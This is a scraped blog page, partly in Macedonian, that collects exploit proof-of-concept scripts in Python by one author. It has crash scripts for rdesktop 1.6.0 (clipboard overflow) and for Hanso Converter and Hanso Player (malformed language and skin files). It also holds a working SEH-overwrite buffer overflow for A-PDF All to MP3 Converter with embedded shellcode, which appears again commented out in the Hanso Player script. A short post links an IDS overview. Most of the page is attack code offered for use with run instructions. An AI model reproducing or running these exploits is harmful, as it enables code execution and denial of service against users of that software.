f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”) 

rdestkop 1.6.0 Memory Corruption (Copy from clipboard) PoC


Link

#rdestkop 1.6.0 Memory Corruption (Copy from clipboard) PoC
#By Dame Jovanoski (badc0re)
#
# This is the result of 262120 inserted into clipboard and coppied on remote machine
# using rdesktop 1.6.0 tested od Ubuntu 9.10
#
# Use of this exploit: python rdeskop.py
#
# And next is shift-insert(or ctrl-v) for copy
#
# This is what you get:
#
#root@bt:~# rdesktop 192.168.204.133
#WARNING: Remote desktop does not support colour depth 24; falling back to 16
#*** glibc detected *** rdesktop: double free or corruption (fasttop): 0x083f3250 ***
#======= Backtrace: =========
#/lib/tls/i686/cmov/libc.so.6[0xb7a4d454]
##/lib/tls/i686/cmov/libc.so.6(cfree+0x96)[0xb7a4f4b6]
#/usr/lib/libX11.so.6(XFree+0x1d)[0xb7b74fdd]
#rdesktop[0x805f43f]
#rdesktop[0x805a2b6]
##rdesktop[0x80630ff]
#rdesktop[0x80636d8]
#rdesktop[0x8063848]
#rdesktop[0x8064013]
#rdesktop[0x806484b]
#rdesktop[0x80663e3]
#rdesktop[0x80672b9]
#rdesktop[0x8067dbc]
#rdesktop[0x804ec2a]
#/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb79f4685]
#rdesktop[0x804ca61]
#======= Memory map: ========
#08048000-0807c000 r-xp 00000000 03:01 114747     /usr/bin/rdesktop
#0807c000-0807d000 r–p 00034000 03:01 114747     /usr/bin/rdesktop
#0807d000-0807f000 rw-p 00035000 03:01 114747     /usr/bin/rdesktop
#0807f000-08418000 rw-p 00000000 00:00 0          [heap]
#b7500000-b7521000 rw-p 00000000 00:00 0
#b7521000-b7600000 —p 00000000 00:00 0
#b769b000-b771c000 rw-p 00000000 00:00 0
#b791d000-b7925000 r-xp 00000000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7925000-b7926000 r–p 00007000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7926000-b7927000 rw-p 00008000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7927000-b792f000 r-xp 00000000 03:01 120903     /usr/lib/libXcursor.so.1.0.2
#b792f000-b7930000 rw-p 00007000 03:01 120903     /usr/lib/libXcursor.so.1.0.2
#b7933000-b7940000 r-xp 00000000 03:01 105519     /lib/libgcc_s.so.1
#b7940000-b7941000 r–p 0000c000 03:01 105519     /lib/libgcc_s.so.1
#b7941000-b7942000 rw-p 0000d000 03:01 105519     /lib/libgcc_s.so.1
#b7942000-b794c000 r-xp 00000000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794c000-b794d000 r–p 00009000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794d000-b794e000 rw-p 0000a000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794e000-b7957000 r-xp 00000000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7957000-b7958000 r–p 00008000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7958000-b7959000 rw-p 00009000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7959000-b796e000 r-xp 00000000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796e000-b796f000 r–p 00014000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796f000-b7970000 rw-p 00015000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b7970000-b7972000 rw-p 00000000 00:00 0
#b7972000-b7979000 r-xp 00000000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b7979000-b797a000 r–p 00006000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797a000-b797b000 rw-p 00007000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797b000-b797c000 rw-p 00000000 00:00 0
#b797c000-b7980000 r-xp 00000000 03:01 120909     /usr/lib/libXdmcp.so.6.0.0
#b7980000-b7981000 rw-p 00003000 03:01 120909     /usr/lib/libXdmcp.so.6.0.0
#b7981000-b7982000 rw-p 00000000 00:00 0
#b7982000-b7984000 r-xp 00000000 03:01 120891     /usr/lib/libXau.so.6.0.0
#b7984000-b7985000 rw-p 00001000 03:01 120891     /usr/lib/libXau.so.6.0.0
#b7985000-b799c000 r-xp 00000000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799c000-b799d000 r–p 00016000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799d000-b799e000 rw-p 00017000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799e000-b799f000 r-xp 00000000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b799f000-b79a0000 r–p 00000000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b79a0000-b79a1000 rw-p 00001000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b79a1000-b79a8000 r-xp 00000000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79a8000-b79a9000 r–p 00007000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79a9000-b79aa000 rw-p 00008000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79aa000-b79bf000 r-xp 00000000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79bf000-b79c0000 r–p 00014000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c0000-b79c1000 rw-p 00015000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c1000-b79c4000 rw-p 00000000 00:00 0
#b79c4000-b79d8000 r-xp 00000000 03:01 215832     /usr/lib/libz.so.1.2.3.3
#b79d8000-b79da000 rw-p 00013000 03:01 215832     /usr/lib/libz.so.1.2.3.3
#b79da000-b79dc000 r-xp 00000000 03:01 122310     /lib/tls/i686/cmov/libdl-2.8.90.so
#b79dc000-b79dd000 r–p 00001000 03:01 122310     /lib/tls/i686/cmov/libdl-2.8.90.Aborted

from struct import *
import time
import pygtk
pygtk.require(‘2.0’)
import gtk
import sys

print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
buf=”\x41″*262120
try:
clipboard = gtk.clipboard_get()
text=clipboard.wait_for_text()
clipboard.set_text(buf)
clipboard.store()
print “String is copied into clipboard.”
except:
print “String cannot be copied into clipboard.”

Hanso Converter v1.1.0 Buffer Overflow – DoS (Language File .xml)


link

# Exploit Title: Hanso Converter v1.1.0 Language File Buffer Overflow – Denial OF Service
# Date: 05.02.2011
# Author: Dame Jovanoski(badc0re)
# Software Link: http://www.hansotools.com/downloads/hanso-converter-setup.exe
# Version: v1.1.0
# Tested on: XP sp3
# Type of exploit:local 

from struct import *
import time
f=open(“app_fr.xml”,”w”)
print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
junk=”\x41″*100
try:
f.write(junk)
f.close()
print “File created”
except:
print “File cannot be created”

Hanso Player 1.4.0.0 Buffer Overflow – DoS Skinfile default.ini


link

# Hanso Player 1.4.0.0 Buffer Overflow – DoS Skinfile default.ini
#(possible stack cookie check)
#By Dame Jovanoski(badc0re)
#
#
#
from struct import *
import time
f=open(“default.ini”,”w”)
#shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
#       “\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
#       “\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
#       “\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
#       “\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
#       “\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
#       “\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
#       “\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
#       “\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
#       “\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);
print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
junk=”\x41″*4418
head=(“\x5B\x48\x61\x6E\x73\x6F\x20\x50”
“\x6C\x61\x79\x65\x72\x20\x53\x6B”
“\x69\x6E\x5D\x0A”)
try:
f.write(head+junk)
f.close()
print “File created”
except:
print “File cannot be created”

IDS(Intrusion Detection System) – краток преглед на карактеристиките

 

Еден документ што го напишав во врска со овие системи за нивните карактеристики, архитектура,типови и принципот како работат.

http://rapidshare.com/files/446337144/IDS.pdf

 

A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit Објаснување на функционалности


Back on track……Ме немаше некое време hhhh

Како за почеток една ремејк скрипта на http://www.exploit-db.com/exploits/15033/ што ќе ја објаснам за некое време за тоа како се креира BOF во Windows со SEH. За тоа подоцна…..

from struct import *
import time
f=open(“A-PDF All to MP3.wav”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);
print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
junk=”\x41″*4132
print “Your shellcode size is:”,len(shell)
nseh=”\xeb\x06\x90\x90″
seh=”\x75\x95\x00\x6d”#6d009575 POP ESI
try:
f.write(junk+nseh+seh+shell)
f.close()
print “File created”
except:
print “File cannot be created”